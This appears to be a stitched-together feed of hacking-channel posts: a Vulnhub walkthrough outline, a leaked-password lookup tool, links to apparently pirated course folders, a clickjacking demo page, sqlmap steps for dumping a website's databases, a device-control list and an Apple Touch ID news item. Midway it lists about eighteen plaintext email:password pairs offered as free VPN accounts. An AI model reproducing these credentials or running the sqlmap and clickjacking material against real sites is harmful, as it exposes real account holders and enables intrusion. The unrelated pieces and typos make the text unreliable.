HA Rudra_ Vulnhub Walkthrough
FULL WITH PICTURES

Initial Compromise
LFI
Established Foothold
Netcat session
Internal Recon
Access Mysql database
Data Exfiltration
Steganography
Lateral Movement
Connect to ssh
Privilege Escalation
Sudo rights

E N J O Y❤️👍🏻

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Checking tool for Hash codes, Passwords, and Emails leaked, using leakz module from Aidan Holland, which uses API from Aurelius Wendelken.

🦑F E A T U R E S :

-Grabb email passwords NEW!
-Check passwords leaked.
-Check hash code leaked.
-Check email leaked!

🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽 :

1) sudo apt update && sudo apt install python3 python3-pip

2) git clone https://github.com/GitHackTools/Leaked

3) cd Leaked

4) bash install_update.sh

5) python3 leaked.py

🦑Install and Run on Windows

1) Download and run Python 3 setup file from Python.org. In Install Python 3 , enable Add Python 3.7 to PATH and For all users

2) Download and run Git setup file from Git-scm.com, choose Use Git from Windows Command Propmt.

3) After that, Run Command Propmt or PowerShell and enter these commands:

4) git clone https://github.com/GitHackTools/Leaked

5) cd Leaked

6) ./install_update.bat

7) python leaked.py

8) choose options via numbers

E N J O Y ❤️👍🏻
@UndercodeTesting
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑2020 RUBY PROGRAMMING :
https://mega.nz/folder/CVFmxIaL#B5ooaSw516r44kww9JS02

1 - Introduction
https://mega.nz/folder/jZM0iKoD#qljohgw3xwiq7e186uptfg

2 - Ruby Basics
https://mega.nz/folder/yRVEAAbA#JTwlg13H3P32AdyN4XVGlQ

3 - Intermediate Ruby
https://mega.nz/folder/mBcUCaaZ#ODO848xBoUfy8BinuXdL_Q

4 - Advanced Ruby
https://mega.nz/folder/CMMUkALC#mJR3DU5RGYCPkTG7UoFTuA

🦑New NordVpn Premium :

jverant@bellsouth.net:!QAZ1qaz | Expiration = 2020-08-22 20:02:14
jwesenberg81@gmail.com:w3s3nb3rg | Expiration = 2021-07-26 22:47:02
k.fryd@yahoo.com:baobab81 | Expiration = 2022-09-14 07:14:00
kalibaker1@hotmail.com:hannah77 | Expiration = 2020-10-20 02:47:38
kanold@hotmail.com:micke300 | Expiration = 2020-08-23 12:10:03
karolistoleikis@gmail.com:tcqgy3XZ5 | Expiration = 2020-12-31 00:00:00
karolst@op.pl:len1ngrad | Expiration = 2021-08-03 00:00:00
katiehailey00@gmail.com:daycation | Expiration = 2023-01-17 19:14:24
katya.boudsocq@overnewton.vic.edu.au:Katyab13 | Expiration = 2021-05-17 13:16:20
kaushalagandhi@hotmail.com:Moose12345 | Expiration = 2021-05-31 13:28:47
kaushik.kasi@gmail.com:kskaushik | Expiration = 2021-08-11 21:02:29
kbrabeck1@gmail.com:oct201999 | Expiration = 2021-07-24 22:32:40
kcf129@gmail.com:c24i3efe | Expiration = 2022-08-02 20:31:04
kcmyron@hotmail.com:fblwr830 | Expiration = 2022-06-26 10:56:21
keanu.jenn@ewe.net:gismo9999 | Expiration = 2022-11-13 11:40:48
kelly.west340@gmail.com:Vermouth3 | Expiration = 2021-02-22 19:07:13
kellybogestrada@gmail.com:jim12312 | Expiration = 2022-01-12 20:15:43
kennylikar@gmail.com:Bluetooth123 | Expiration = 2021-04-07 00:41:22

E N J O Y ❤️👍🏻

Respecting Lebanon & Lebaneese here...

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑The clickjacking attack :

1) The “clickjacking” attack allows an evil page to click on a “victim site” on behalf of the visitor.

2) Many sites were hacked this way, including Twitter, Facebook, Paypal and other sites. They have all been fixed, of course.

The idea
The idea is very simple.

3) Here’s how clickjacking was done with Facebook:

E X A M P L E :

4) A visitor is lured to the evil page. It doesn’t matter how.
The page has a harmless-looking link on it (like “get rich now” or “click here, very funny”).

5) Over that link the evil page positions a transparent <iframe> with src from facebook.com, in such a way that the “Like” button is right above that link. Usually that’s done with z-index.

6) In attempting to click the link, the visitor in fact clicks the button.
The demo

7) Here’s how the evil page looks. To make things clear, the <iframe> is half-transparent (in real evil pages it’s fully transparent):

<style>
iframe { /* iframe from the victim site */
  width: 400px;
  height: 100px;
  position: absolute;
  top:0; left:-20px;
  opacity: 0.5; /* in real opacity:0 */
  z-index: 1;
}
</style>

<div>Click to get rich now:</div>

<!-- The url from the victim site -->
<iframe src="/clickjacking/facebook.html"></iframe>

<button>Click here!</button>

<div>...And you're cool (I'm a cool hacker actually)!</div>

E N J O Y ❤️👍🏻
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Git and Git lab - Start to Finish :

https://mega.nz/folder/6dknFKbQ#YQPkqZ2UU6TI6gyzumSZPA

> 1 - Introduction
https://mega.nz/folder/WBkl1AqB#BOMUQltfwAjpFI3miFBOpQ

2 - Installation and Configuration
https://mega.nz/folder/bdsRDa7a#9CKII1PWcJG6Otvqz9R3yA

3 - Git Basics
https://mega.nz/folder/eU0zCSYC#E0mtmN14OnKlvY2UkQheHw

4 - Cloning
https://mega.nz/folder/zJ91WQIC#7We5fLvDK5XXUiHr6H1_wA

5 - Tagging, Branching and Merging
https://mega.nz/folder/bM9DyQSb#e2C0g6t5T3G-ks-Xp_L-tw

6 - Logging and Repository Auditing
https://mega.nz/folder/2dkhgAYB#0oYYGrEY8jQtCT9D5Kc0yA

7 - Working with Github
https://mega.nz/folder/PAtVmCzB#9db3PvqgZanPX1D2lEGdQg

8 - Working with Atlassian Bitbucket
https://mega.nz/folder/SIszkYJZ#sAQJlvHD6aoGFLCDQuEj0Q

9 - Gitlab Installation, Configuration and Use
https://mega.nz/folder/qdlXHIzZ#p40Fmw3oA_voG6TPpY-VmA

https://mega.nz/folder/qdlXHIzZ#p40Fmw3oA_voG6TPpY-VmA

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑How to set up a black and white list of web pages and prohibit computers from accessing certain websites

1) Control the USB port. It is forbidden to connect the computer to USB storage devices (U disk, mobile phone, tablet, mobile hard disk, SD card, USB optical drive, etc.), but does not control USB non-storage devices, such as mouse, keyboard, etc. You can also set a specific USB storage device, that is, the computer can only recognize the USB storage device, and you can also set this specific storage device to only copy files to the computer, but not from the computer to it. You can also set a password to copy files.

2) Control the transmission of files from the external network. It is forbidden to send files through the external network, including: setting a specific QQ account to log in or allowing QQ chat, prohibiting QQ uploading files, prohibiting QQ group uploading files, allowing WeChat chatting, prohibiting WeChat uploading files, prohibiting the use of network disks, prohibiting the use of cloud disks, and prohibiting Use mailboxes, prohibit the use of FTP, prohibit the use of any network application to transfer files, etc.

3) Control the transmission of files in the intranet. It is forbidden to use any intranet communication tools, such as Fei Ge, Fei Qiu, etc., and it can also prohibit LAN communication, network sharing, and network cable transmission of computer files.

4) Other methods. It is prohibited to use Bluetooth to send files, prohibit the use of infrared to send files, prohibit computers to install portable wifi to send files, prohibit computers to install wireless routers to send computer files, prohibit computers to install virtual machines to send files, prohibit remote desktops to send computer files, prohibit the use of clipboards, Screenshots etc. are prohibited.

E N J O Y ❤️👍🏻
@UndercodeTesting
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑FastTips SqlMap for #termux :

1) apt-get update

2) apt-get upgrade

3) pkg install perl

4) pkg install python2

5) pkg install git

6) git clone https://github.com/sqlmapproject/sqlmap

7) cd sqlmap

8) python2 swlmap.py

9) python2 sqlmap.py -u #website_link --dbs

10) python2 sqlmap.py -u #website_link --dbs --columns

@UndercodeTesting
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Apple Touch ID vulnerability could allow attackers to hijack iCloud account
#NEWS


> Earlier this year, Apple fixes iOS and a macOS the security vulnerability , the vulnerability could allow an attacker to gain unauthorized access to a user's iCloud account.

> This Alkemade, a security expert at IT security company Computest, discovered the vulnerability in February. The vulnerability exists in the TouchID (or FaceID) biometric feature implemented by Apple, which authenticates users to log in to websites on Safari. These are the websites that use Apple ID to log in. After the vulnerability was reported to Apple through the disclosure program, the iPhone manufacturer resolved the vulnerability in a server-side update .

🦑Certification defects :
The core of the vulnerability is: when a user tries to log in to a website that requires Apple ID, it will be prompted to use Touch ID to authenticate the login. Doing so will skip the two-factor authentication step, because it already uses multiple factors for identification, such as equipment and biometric information. When logging in to an Apple domain (such as "icloud.com"), ID and password are usually used for comparison. The website embeds an iframe pointing to Apple’s login authentication server ("https://idmsa.apple.com"). Handle the authentication process.

#NEWS
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁